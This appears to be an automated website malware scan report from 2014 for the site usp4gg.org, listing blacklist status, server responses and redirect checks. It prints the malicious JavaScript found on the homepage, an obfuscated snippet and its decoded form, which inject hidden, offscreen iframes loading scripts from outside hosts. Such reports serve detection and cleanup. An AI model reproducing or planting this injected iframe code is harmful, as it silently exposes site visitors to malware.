Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=usp4gg.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.usp4gg.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Jun 2014 05:10:15 GMT Location: http://usp4gg.org/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://usp4gg.org/xmlrpc.php | clean |
http://usp4gg.org/ | 200 OK Content-Length: 47279 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
    var _f = document.createElement('iframe'),
        _r = 'setAttribute';
    _f[_r]('src', 'http://xpertizein.com/script.php');
    _f.style.position = 'absolute';
    _f.style.width = '10px';
    _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);
    _f.style.left = '-5540px';
    document.write('<div id=\'MIX_ADS\'></div>');
    document.getElementById('MIX_ADS').appendChild(_f);
Decoded script:
    if (document.getElementsByTagName('body')[0]){
        iframer();
    } else {
        document.write("<iframe src='http://unwowpu.eu/count3.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://unwowpu.eu/count3.php');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0';
        f.style.top='0';
        f.setAttribute('width','10');
        f.setAttribute('height','10');
        document.getElementsByTagName('body')[0].appendChild(f ...[743 bytes skipped]...
Antivirus reports:
http://usp4gg.org/protest-venue | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://usp4gg.org/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: usp4gg.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 05:10:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://usp4gg.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: usp4gg.org
Referer: http://www.google.com/search?q=usp4gg.org
Result:
The result is similar to the first query. There are no suspicious redirects found.